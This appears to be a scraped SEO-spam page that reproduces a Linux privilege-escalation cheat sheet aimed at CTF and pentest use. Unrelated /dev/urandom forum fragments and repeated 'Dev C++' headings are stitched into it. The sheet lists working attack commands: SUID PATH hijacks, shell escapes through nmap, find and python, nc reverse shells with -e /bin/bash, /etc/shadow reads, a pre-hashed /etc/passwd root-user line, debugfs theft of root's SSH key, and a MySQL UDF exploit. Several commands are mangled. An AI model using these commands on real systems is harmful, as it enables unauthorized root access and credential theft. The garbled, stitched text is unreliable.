Dev C++ Privilege Escalation

11.06.2020by

Tips and Tricks for Linux Priv Escalation

Fix the Shell:

Start with the basics

Who am i and what groups do I belong to?
id

Who else is on this box (lateral movement)?
ls -la /home
cat /etc/passwd

What Kernel version and distro are we working with here?
uname -a
cat /etc/issue

The Exploit Database is maintained by Offensive Security, an information security training company that provides various Information Security Certifications as well as high end penetration testing services. The Exploit Database is a non-profit project that is provided as a public service by Offensive Security. In plain English, this command says to find files in the / directory owned by the user root with SUID permission bits (-perm -4000), print them, and then redirect all errors (2 = stderr) to /dev/null (where they get thrown away). Sep 29, 2017  dev Privilege escalation on remote hosts. MANY remote hosts. Showing 1-22 of 22 messages.

What new processes are running on the server (Thanks to IPPSEC for the script!):

We can also use pspy on linux to monitor the processes that are starting up and running:
https://github.com/DominicBreuker/pspy

Check the services that are listening:

What can we EXECUTE?

Who can execute code as root (probably will get a permission denied)?
cat /etc/sudoers

Can I execute code as root (you will need the user's password)?
sudo -l

What executables have SUID bit that can be executed as another user?
find / -type f -user root -perm /u+s -ls 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;

Do any of the SUID binaries run commands that are vulnerable to file path manipulation?
strings /usr/local/bin/binaryelf
mail
echo '/bin/sh' > /tmp/mailcd /tmp
export PATH=.
/usr/local/bin/binaryelf

Do any of the SUID binaries run commands that are vulnerable to Bash Function Manipulation?strings /usr/bin/binaryelf
mailfunction /usr/bin/mail() { /bin/sh; }
export -f /usr/bin/mail
/usr/bin/binaryelf

Can I write files into a folder containing a SUID bit file?
Might be possible to take advantage of a '.' in the PATH or an The IFS (or Internal Field Separator) Exploit.

If any of the following commands appear on the list of SUID or SUDO commands, they can be used for privledge escalation:

SUID / SUDO ExecutablesPriv Esc Command (will need to prefix with sudo if you are using sudo for priv esc.
(ALL : ALL ) ALLYou can run any command as root.
sudo su -
sudo /bin/bash
nmap
(older versions 2.02 to 5.21)
nmap --interactive
!sh
netcat
nc
nc.traditional
nc -nlvp 4444 &
nc -e /bin/bash 127.0.0.1 4444
ncat
awk
gawk
awk '{ print }' /etc/shadow
awk 'BEGIN {system('id')}'
pythonpython -c 'import pty;pty.spawn('/bin/bash')'
php
findfind /home -exec nc -lvp 4444 -e /bin/bash ;
find /home -exec /bin/bash ;
xxd
vi
more
less
nano
cp
cat
bash
ash
sh
csh
curl
dash
pico
nano
vrim
tclsh
git
scp
expect
ftp
socat
script
ssh
zsh
tclsh
straceWrite and compile a a SUID SUID binary c++ program
strace chown root:root suid
strace chmod u+s suid
./suid
npmln -s /etc/shadow package.json && sudo /usr/bin/npm i *
rsync
tar
Screen-4.5.00https://www.exploit-db.com/exploits/41154/

Note: You can find an incredible list of Linux binaries that can lead to privledge escalation at the GTFOBins project website here:
https://gtfobins.github.io/

Can I access services that are running as root on the local network?
netstat -antup
ps -aux grep root

Network Services Running as RootExploit actions
mysqlraptor_udf2 exploit
0xdeadbeef.info/exploits/raptor_udf2.c
insert into foo values(load_file('/home/smeagol/raptor_udf2.so'));
apachedrop a reverse shell script on to the webserver
nfsno_root_squash parameter
Or
if you create the same user name and matching user id as the remote share you can gain access to the files and write new files to the share
PostgreSQLhttps://www.exploit-db.com/exploits/45184/

Are there any active tmux sessions we can connect to?
tmux ls

What can we READ?

What files and folders are in my home user's directory?
ls -la ~

Dev c++ privilege escalation form

Do any users have passwords stored in the passwd file?cat /etc/passwd

Are there passwords for other users or RSA keys for SSHing into the box?
ssh -i id_rsa root@10.10.10.10

Are there configuration files that contain credentials?

Application and config fileConfig File Contents
WolfCMS
config.php
// Database settings:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
Generic PHP Web Appdefine('DB_PASSWORD', 's3cret');
.ssh directoryauthorized_keys
id_rsa
id_rsa.keystore
id_rsa.pub
known_hosts
User MySQL Info.mysql_history
.my.cnf
User Bash History.bash_history

Are any of the discovered credentials being reused by multiple acccounts?
sudo - username
sudo -s

Are there any Cron Jobs Running?
cat /etc/crontab

What files have been modified most recently?
find /etc -type f -printf '%TY-%Tm-%Td %TT %pn' sort -r
find /home -type f -mmin -60
find / -type f -mtime -2

Is the user a member of the Disk group and can we read the contents of the file system?
debugfs /dev/sda
debugfs: cat /root/.ssh/id_rsa
debugfs: cat /etc/shadow

Is the user a member of the Video group and can we read the Framebuffer?
cat /dev/fb0 > /tmp/screen.raw
cat /sys/class/graphics/fb0/virtual_size

Where can we WRITE?

What are all the files can I write to?
find / -type f -writable -path /sys -prune -o -path /proc -prune -o -path /usr -prune -o -path /lib -prune -o -type d 2>/dev/null

What folder can I write to?
find / -regextype posix-extended -regex '/(sys srv proc usr lib var)' -prune -o -type d -writable 2>/dev/null

Writable Folder / filePriv Esc Command
/home/USER/Create an ssh key and copy it to the .ssh/authorized_keys folder the ssh into the account
/etc/passwdmanually add a user with a password of 'password' using the following syntax
user:$1$xtTrK/At$Ga7qELQGiIklZGDhc6T5J0:1000:1000:,:/home/user:/bin/bash
You can even escalate to the root user in some cases with the following syntax:
admin:$1$xtTrK/At$Ga7qELQGiIklZGDhc6T5J0:0:0:,:/root:/bin/bash

Root SSH Key If Root can login via SSH, then you might be able to find a method of adding a key to the /root/.ssh/authorized_keys file.

Add SUDOers If we can write arbitrary files to the host as Root, it is possible to add users to the SUDO-ers group like so (NOTE: you will need to logout and login again as myuser):
/etc/sudoers

Set Root Password We can also change the root password on the host if we can write to any file as root:
/etc/shadow

Kernel Exploits

Dev C++ Privilege Escalation

Based on the Kernel version, do we have some reliable exploits that can be used?

UDEV - Linux Kernel < 2.6 & UDEV < 1.4.1 - CVE-2009-1185 - April 2009

RDS - Linux Kernel <= 2.6.36-rc8 - CVE-2010-3904 - Linux Exploit -

perf_swevent_init - Linux Kernel < 3.8.9 (x86-64) - CVE-2013-2094 - June 2013

mempodipper - Linux Kernel 2.6.39 < 3.2.2 (x86-64) - CVE-2012-0056 - January 2012

Dirty Cow - Linux Kernel 2.6.22 < 3.2.0/3.13.0/4.8.3 - CVE-2016-5195 - October 2016

KASLR / SMEP - Linux Kernel < 4.4.0-83 / < 4.8.0-58 - CVE-2017-1000112 - August 2017

Great list here:https://github.com/lucyoa/kernel-exploits

Automated Linux Enumeration Scripts

Dev C Privilege Escalation Definition

It is always a great idea to automate the enumeration process once you understand what you are looking for.

LinEmum.sh

LinEnum is a handy method of automating Linux enumeration. It is also written as a shell script and does not require any other intpreters (Python,PERL etc.) which allows you to run it file-lessly in memory.

First we need to git a copy to our local Kali linux machine:

Next we can serve it up in the python simple web server:

And now on our remote Linux machine we can pull down the script and pipe it directly to Bash:

And the enumeration script should run on the remote machine.

CTF Machine Tactics

Often it is easy to identify when a machine was created by the date / time of file edits.We can create a list of all the files with a modify time in that timeframe with the following command:

This has helped me to find interesting files on a few different CTF machines.

Recursively searching for passwords is also a handy technique:

Dev C++ Privilege Escalation Form

Wget Pipe a remote URL directory to Bash (linpeas):

Curl Pipe a remote URL directly to Bash (linpeas):

Using SSH Keys

Often, we are provided with password protected SSH keys on CTF boxes. It it helpful to be able to quicky crack and add these to your private keys.

First we need to convert the ssh key using John:

Next we will need to use that format to crack the password:

John should output a password for the private key.

Windows Xp Privilege Escalation

References

Dev C Privilege Escalation Plan

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
http://www.hackingarticles.in/linux-privilege-escalation-using-exploiting-sudo-rights/
https://payatu.com/guide-linux-privilege-escalation/
http://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/
http://www.0daysecurity.com/penetration-testing/enumeration.html
https://www.rebootuser.com/?p=1623#.V0W5Pbp95JP
https://www.doomedraven.com/2013/04/hacking-linux-part-i-privilege.html
https://securism.wordpress.com/oscp-notes-privilege-escalation-linux/
https://haiderm.com/linux-privilege-escalation-using-weak-nfs-permissions/
http://hackingandsecurity.blogspot.com/2016/06/exploiting-network-file-system-nfs.html
https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txthttps://hkh4cks.com/blog/2017/12/30/linux-enumeration-cheatsheet/
https://digi.ninja/blog/when_all_you_can_do_is_read.php
https://medium.com/@D00MFist/vulnhub-lin-security-1-d9749ea645e2
https://gtfobins.github.io/
https://github.com/rebootuser/LinEnum

Head -c 30 /dev/urandom random.bytes You can read from it as a normal user. Leave alone /dev/random. Normally, you want to use /dev/urandom, not /dev/random. The problem is that /dev/random is hard to use in the right way - and easy to use in a wrong way. Using it wrong works at first, but creates strange - even random - performance problems. @forest Supposedly writing to urandom won't cause any negative effects, so I figured it might as well open as read write in case the user wants to write to it. If it's early in the boot phase and the system doesn't have writable disks for storing entropy from the previous run then it might be worthwhile to read data from an external server to. Oct 04, 2005  I'm trying to read an eight byte number from /dev/urandom, but i want the number to be in hexademical. For example: Code: char.bytes; bytes = (char.)m reading from /dev/urandom in c Share your knowledge at the LQ Wiki. File /dev/random has major device number 1 and minor device number 8. File /dev/urandom has major device number 1 and minor device number 9. The random number generator gathers environmental noise from device drivers and other sources into an entropy pool. I'm looking for ways to use /dev/random (or /dev/urandom) from the command line.In particular, I'd like to know how to use such a stream as stdin to write streams of random numbers to stdout (one number per line). I'm interested in random numbers for all the numeric types that the machine's architecture supports natively. Dev urandom example c code.

Comments are closed.